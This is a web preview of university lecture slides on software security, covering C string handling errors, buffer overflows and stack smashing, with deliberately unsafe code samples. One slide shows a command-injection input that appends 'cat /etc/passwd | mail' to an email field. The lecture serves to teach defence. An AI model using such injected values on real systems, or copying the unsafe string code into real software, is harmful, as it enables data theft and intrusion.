DOC PREVIEW
Pitt IS 2150 - Race Conditions Vulnerability related Integers

This preview shows page 1-2-3-4-5-39-40-41-42-43-44-78-79-80-81-82 out of 82 pages.

Save
View full document
View full document
Premium Document
Do you want full access? Go Premium and unlock all 82 pages.
Access to all documents
Download any document
Ad free experience
View full document
Premium Document
Do you want full access? Go Premium and unlock all 82 pages.
Access to all documents
Download any document
Ad free experience
View full document
Premium Document
Do you want full access? Go Premium and unlock all 82 pages.
Access to all documents
Download any document
Ad free experience
View full document
Premium Document
Do you want full access? Go Premium and unlock all 82 pages.
Access to all documents
Download any document
Ad free experience
View full document
Premium Document
Do you want full access? Go Premium and unlock all 82 pages.
Access to all documents
Download any document
Ad free experience
View full document
Premium Document
Do you want full access? Go Premium and unlock all 82 pages.
Access to all documents
Download any document
Ad free experience
View full document
Premium Document
Do you want full access? Go Premium and unlock all 82 pages.
Access to all documents
Download any document
Ad free experience
View full document
Premium Document
Do you want full access? Go Premium and unlock all 82 pages.
Access to all documents
Download any document
Ad free experience
View full document
Premium Document
Do you want full access? Go Premium and unlock all 82 pages.
Access to all documents
Download any document
Ad free experience
View full document
Premium Document
Do you want full access? Go Premium and unlock all 82 pages.
Access to all documents
Download any document
Ad free experience
View full document
Premium Document
Do you want full access? Go Premium and unlock all 82 pages.
Access to all documents
Download any document
Ad free experience
View full document
Premium Document
Do you want full access? Go Premium and unlock all 82 pages.
Access to all documents
Download any document
Ad free experience
View full document
Premium Document
Do you want full access? Go Premium and unlock all 82 pages.
Access to all documents
Download any document
Ad free experience
View full document
Premium Document
Do you want full access? Go Premium and unlock all 82 pages.
Access to all documents
Download any document
Ad free experience
View full document
Premium Document
Do you want full access? Go Premium and unlock all 82 pages.
Access to all documents
Download any document
Ad free experience
View full document
Premium Document
Do you want full access? Go Premium and unlock all 82 pages.
Access to all documents
Download any document
Ad free experience
Premium Document
Do you want full access? Go Premium and unlock all 82 pages.
Access to all documents
Download any document
Ad free experience

Unformatted text preview:

1IS 2150 / TEL 2810Introduction to SecurityJames JoshiAssistant Professor, SISLecture 13Dec 6, 2007Race Conditions,Vulnerability relatedIntegers. StringBuffer overflow2Objectives Understand/explain the issues, and utilize the techniques related to Malicious code What and how Vulnerability analysis/classification Techniques Taxonomy Intrusion Detection and Auditing Systems3Issues Strings Background and common issues Common String Manipulation Errors String Vulnerabilities Mitigation Strategies4Strings Comprise most of the data exchanged between an end user and a software system command-line arguments environment variables console input Software vulnerabilities and exploits are caused by weaknesses in string representation string management string manipulation5C-Style Strings Strings are a fundamental concept in software engineering, but they are not a built-in type in C or C++. C-style strings consist of a contiguous sequence of characters terminated by and including the first null character.  A pointer to a string points to its initial character.  String length is the number of bytes preceding the null character The string value is the sequence of the values of the contained characters, in order. The number of bytes required to store a string is the number of characters plus one (x the size of each character)h e l l o \0length6Common String Manipulation Errors Common errors include Unbounded string copies Null-termination errors Truncation Write outside array bounds Off-by-one errors Improper data sanitization7Unbounded String Copies Occur when data is copied from an unbounded source to a fixed length character array1. int main(void) {2. char Password[80];3. puts("Enter 8 character password:");4. gets(Password); ...5. }1. #include <iostream.h>2. int main(void) {3. char buf[12];4. cin >> buf;5. cout<<"echo: "<<buf<<endl;6. }8Simple Solution Test the length of the input using strlen() and dynamically allocate the memory1. int main(int argc, char *argv[]) {2. char *buff = (char *)malloc(strlen(argv[1])+1);3. if (buff != NULL) {4. strcpy(buff, argv[1]);5. printf("argv[1] = %s.\n", buff);6. }7. else {/* Couldn't get the memory - recover */8. }9. return 0;10. }9Null-Termination Errors Another common problem with C-style strings is a failure to properly null terminateint main(int argc, char* argv[]) {char a[16];char b[16];char c[32];strncpy(a, "0123456789abcdef", sizeof(a));strncpy(b, "0123456789abcdef", sizeof(b));strncpy(c, a, sizeof(c));}Neither a[] nor b[] are properly terminated10String Truncation Functions that restrict the number of bytes are often recommended to mitigate against buffer overflow vulnerabilities strncpy() instead of strcpy() fgets() instead of gets() snprintf() instead of sprintf() Strings that exceed the specified limits are truncated Truncation results in a loss of data, and in some cases, to software vulnerabilities11Off-by-One Errors Can you find all the off-by-one errors in this program?1. int main(int argc, char* argv[]) {2. char source[10];3. strcpy(source, "0123456789");4. char *dest = (char *)malloc(strlen(source));5. for (int i=1; i <= 11; i++) {6. dest[i] = source[i];7. }8. dest[i] = '\0';9. printf("dest = %s", dest);10. }12Improper Data Sanitization An application inputs an email address from a user and writes the address to a buffer [Viega03]sprintf(buffer,"/bin/mail %s < /tmp/email",addr); The buffer is then executed using the system() call.  The risk is, of course, that the user enters the following string as an email address: [email protected]; cat /etc/passwd | mail [email protected] [Viega 03] Viega, J., and M. Messier. Secure Programming Cookbook for C and C++: Recipes for Cryptography, Authentication, Networking, Input Validation & More. Sebastopol, CA: O'Reilly, 2003.13What is a Buffer Overflow? A buffer overflow occurs when data is written outside of the boundaries of the memory allocated to a particular data structureDestinationMemorySourceMemoryAllocated Memory (12 Bytes)Other Memory16 Bytes of DataCopy Operation14Buffer Overflows Caused when buffer boundaries are neglected and unchecked Buffer overflows can be exploited to modify a  variable data pointer function pointer return address on the stack15Smashing the Stack This is an important class of vulnerability because of their frequencyand potential consequences. Occurs when a buffer overflow overwrites data in the memory allocated to the execution stack.  Successful exploits can overwrite the return address on the stack allowing execution of arbitrary code on the targeted machine.16Program Stacks A program stack is used to keep track of program execution and state by storing return address in the calling function arguments to the functions  local variables (temporary) The stack is modified  during function calls function initialization when returning from a subroutineCodeDataHeapStack17Stack Segment The stack supports nested invocation calls Information pushed on the stack as a result of a function call is called a frame Stack framefor main()Low memoryHigh memoryStack framefor a()Stack framefor b()Unallocatedb() {…}a() {b();}main() {a();}A stack frame is created for each subroutine and destroyed upon return18Stack Frames The stack is used to store  return address in the calling function actual arguments to the subroutine  local (automatic) variables The address of the current frame is stored in a register (EBP on Intel architectures)  The frame pointer is used as a fixed point of reference within the stack The stack is modified during subroutine calls subroutine initialization  returning from a subroutine19push 4Push 1starg on stackEIP = 00411A82 ESP = 0012FE08 EBP = 0012FEDCcall function (411A29h) Push the return address on stack and jump to addressSubroutine Calls function(4, 2);EIP = 00411A7E ESP = 0012FE10 EBP = 0012FEDCpush 2Push 2ndarg on stackEIP: Extended Instruction PointerESP: Extended Stack PointerEBP: Extended Base PointerrCs1Slide 19rCs1 draw picture of stack on right and put text in action area above registersalso, should create gdb version of thisRobert C. Seacord, 7/6/200420Subroutine Initializationvoid function(int arg1, int arg2) {EIP = 00411A20 ESP = 0012FE04 EBP = 0012FEDCpush ebpSave the frame pointerEIP = 00411A21 ESP =


View Full Document

Pitt IS 2150 - Race Conditions Vulnerability related Integers

Documents in this Course
QUIZ

QUIZ

8 pages

Assurance

Assurance

40 pages

Load more
Download Race Conditions Vulnerability related Integers
Our administrator received your request to download this document. We will send you the file to your email shortly.
Loading Unlocking...
Login

Join to view Race Conditions Vulnerability related Integers and access 3M+ class-specific study document.

or
We will never post anything without your permission.
Don't have an account?
Sign Up

Join to view Race Conditions Vulnerability related Integers 2 2 and access 3M+ class-specific study document.

or

By creating an account you agree to our Privacy Policy and Terms Of Use

Already a member?